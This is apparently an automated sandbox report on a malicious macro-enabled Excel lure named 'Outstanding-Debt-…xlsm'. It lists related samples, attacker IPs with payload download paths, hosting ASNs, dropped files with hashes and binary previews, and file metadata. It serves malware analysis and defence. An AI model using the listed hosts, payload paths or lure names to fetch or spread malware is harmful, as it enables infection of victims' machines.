                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, c-0001.c-msedge.net, e1723.g.akamaiedge.net, download.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                91.211.91.81Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                5.34.179.36Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                GREENFLOID-ASUAOutstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                tetup.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.181.174.176
                                                                                                                                                ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                • 195.123.238.191
                                                                                                                                                2f50000.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.90.59.62
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 82.118.21.70
                                                                                                                                                EgW5u2WYG2.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.99
                                                                                                                                                7IXb5bOTOQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 45.134.255.61
                                                                                                                                                HOSTFORYUAOutstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BC845148-00A9-4205-955C-A92C29B04445
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368381132486292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ccQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:bEQ9DQW+zPXO8
                                                                                                                                                MD5:BDD3706CF64C73F0E59EC65E9572CE19
                                                                                                                                                SHA1:6C5BD13614E90F4574FA90514FD22A5ABD929B40
                                                                                                                                                SHA-256:2C64A8C2612EDEB63EEFEF55C71699D8FF462B5566E71B4E5C6B47A5BA518932
                                                                                                                                                SHA-512:6B49BFA54BEF8DE5379AFE4B7C6B52E224B79BF85E61511789F142881E01935C538FDFA73E46D77DC90CD7FBF7DCA1B9F46CFD8CA7482C9145EC8C0D85AC29F1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T16:27:32">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A5356CA4.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\0F720000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119883
                                                                                                                                                Entropy (8bit):7.6983593378299755
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:XypMvjkvKINbjvw548LMb/oqKO8NnS8+60Kcr+:CMbpAbT648LM7D98Np+EE+
                                                                                                                                                MD5:A8E3E57B3C916A2A211662C611E12DFE
                                                                                                                                                SHA1:A17F4272F6143F31BDE4B193076EEBE6C5067DF3
                                                                                                                                                SHA-256:A5F8E43497C9FD0CCE0F28B84EBE6AA6E60ECC056807BD7A863ADBBEF7C3BD28
                                                                                                                                                SHA-512:EB5183CCCBBD826B3D2DAFB41AAED48955AAD5B8B1491164C3A22DD479863613925ABFF18CF02C6FB6240661A7B5A0D28FA085EA60EFF9CCECFC39347CF9D87E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.36485244490841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:fXFQQULzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fXSg8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:B3266C7F9A25B5565991670AF5B34534
                                                                                                                                                SHA1:2B511F1A0DDF2E018B67E851C60E61DA273935A6
                                                                                                                                                SHA-256:FE8F730097F24BA1391F00766C8AAED59613C9593952DC42D168AF5EBBD14671
                                                                                                                                                SHA-512:0F20A7E37CD6A2AE282504535B8840E0E32964B77CECCFD654A22737F8A763E160750E734F10C4C3165821F80DC3C726033FDD3FE081807638C3DB1D274E2C81
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Wed May 5 00:27:38 2021, atime=Wed May 5 00:27:38 2021, length=12288, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):917
                                                                                                                                                Entropy (8bit):4.648523373469656
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8QDC20UVRlHWCHod/lr5vmsDls8+WMjA+N/E2ybD8TIeYIe8k44t2Y+xIBjKZm:8QDly/ikls1AS8HDG7aB6m
                                                                                                                                                MD5:2188DB3030426B048DD160B0FB78B301
                                                                                                                                                SHA1:7F7E8D0CF8878BB9348F6D67C36CC03E84189E26
                                                                                                                                                SHA-256:2C56A01D8F9F6FDBD32436953962A1AA8CCE12E1B5BB95B5AD6070664A28061B
                                                                                                                                                SHA-512:0A25571DA6481858CA183E24DE2185BC8C4170E2981A8115E25C552D191605353AE2427C3DE6696F2EE96AEAD688A42F1A072B923FD28DB7BED72EE27D179193
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F..........h.!-..p.x.MA....s.MA...0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rg.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...Rg......S........................e.n.g.i.n.e.e.r.....~.1......Rs...Desktop.h.......N...Rs......Y..............>......9..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......536720...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-170373600-05042021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:26:59 2020, mtime=Wed May 5 00:27:38 2021, atime=Wed May 5 00:27:38 2021, length=119879, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2396
                                                                                                                                                Entropy (8bit):4.7135405638764105
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8/HV2dW1IdmBmBiB6p/HV2dW1IdmBmBiB6:8/125IuiK/125Iui
                                                                                                                                                MD5:68A244567A73F15E85C7A753971D9A7F
                                                                                                                                                SHA1:18879993BB6075461EB9A7F85BC10625B585BF75
                                                                                                                                                SHA-256:933ACE80AB5E994F4B5D38B814FA01B544E3BFFE51AFF8E8E2893AE601D91203
                                                                                                                                                SHA-512:06712E257D8692DE535AF0D0A8A69A9106822031A77A14996D17D38F4649B3E3020B6394DA3D1F2DD2C28CC04AA245FF9D0764A8839BF523DBD4B04CF6A3D44E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ......#>.....{.MA....{.MA..G............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rg.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qa{..user..B.......N...Rg......S........................e.n.g.i.n.e.e.r.....~.1.....>Qc{..Desktop.h.......N...Rg......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Rm. .OUTSTA~1.XLS.........>Q`{.Rm......R....................g.>.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.0.3.7.3.6.0.0.-.0.5.0.4.2.0.2.1...x.l.s.m.......q...............-.......p...........>.S......C:\Users\user\Desktop\Outstanding-Debt-170373600-05042021.xlsm..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.0.3.7.3.6.0.0.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...A}...`.......X.......536720...........!a..%.H.VZAj.......1........-$..!a..%.H.VZAj.......1........-$.............1SPS
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):171
                                                                                                                                                Entropy (8bit):4.90833446852784
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:bDesBVomxWhl2BbEUV3ZK6lyEW92BbEUV3ZK6lmxWhl2BbEUV3ZK6lv:bSsjSl2V317W92V31/l2V311
                                                                                                                                                MD5:82671C66C1DCB4F772BA71A2EF39A2F3
                                                                                                                                                SHA1:BC7A7538E78B95C1DCD84A4D6DB1666DAFA8418A
                                                                                                                                                SHA-256:5ADC9C3AFD63F9527D4C69DCD2652601EA6048956E3464C41B3BC36FD158036A
                                                                                                                                                SHA-512:01A4B40A8244AC92218DB47FEFF51184544C1EF463E80DABF99EC7390F48122259DE4B1DE975C1EA4319037D21DB90581D0FFD6195D23385EC7A67AD6162F642
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: [folders]..Desktop.LNK=0..[misc]..Outstanding-Debt-170373600-05042021.LNK=0..Outstanding-Debt-170373600-05042021.LNK=0..[misc]..Outstanding-Debt-170373600-05042021.LNK=0..
                                                                                                                                                C:\Users\user\Desktop\DF720000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119879
                                                                                                                                                Entropy (8bit):7.699263301974161
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/4yF2HzI4t/OyvKINbjvw548LMb/oqKO8NnS8+60Kcr9:AHzleAbT648LM7D98Np+EE9
                                                                                                                                                MD5:5DF3E6FA1F03C08E52BA6BFF03CBA311
                                                                                                                                                SHA1:70BECCDF208552D75579BFD4573FE2321DFD9A01
                                                                                                                                                SHA-256:6E988F7401B32F3AF913AE0B9D45B01E202437F7098A4C3BE5989E20C22D1EE5
                                                                                                                                                SHA-512:E06AAE0A09C6016884DFA5CD5CC50382A8D3F24B106282BF7681BEE3FCC2C7EBB8FC189E831F9C9A1338F6591AEFA74D15330AA35FB41C3C7CF980CFE5038C98
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-170373600-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.688559291002336
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-170373600-05042021.xlsm
                                                                                                                                                File size:116934
                                                                                                                                                MD5:965c271faf86d03c634d62c30c54bbfe
                                                                                                                                                SHA1:541c52b418192627a3948a50ac3aeaf9441570f1
                                                                                                                                                SHA256:ca4072e5c04688b42b9fb306dc7d051260aef6266575b5be8a93e39d075b9abf
                                                                                                                                                SHA512:8f472677e881cd7fc7e16d1ccfb0b0dbbb9b5953e73624cc5830d14f09a482ed17763d497dde8d693ed60480b6749efa5baa54d885cf26fc21f4796602356f8b
                                                                                                                                                SSDEEP:3072:3kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:0AbT648LM7D98Np+EdECx
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404124/sample/Outstanding-Debt-170373600-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:11:27Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

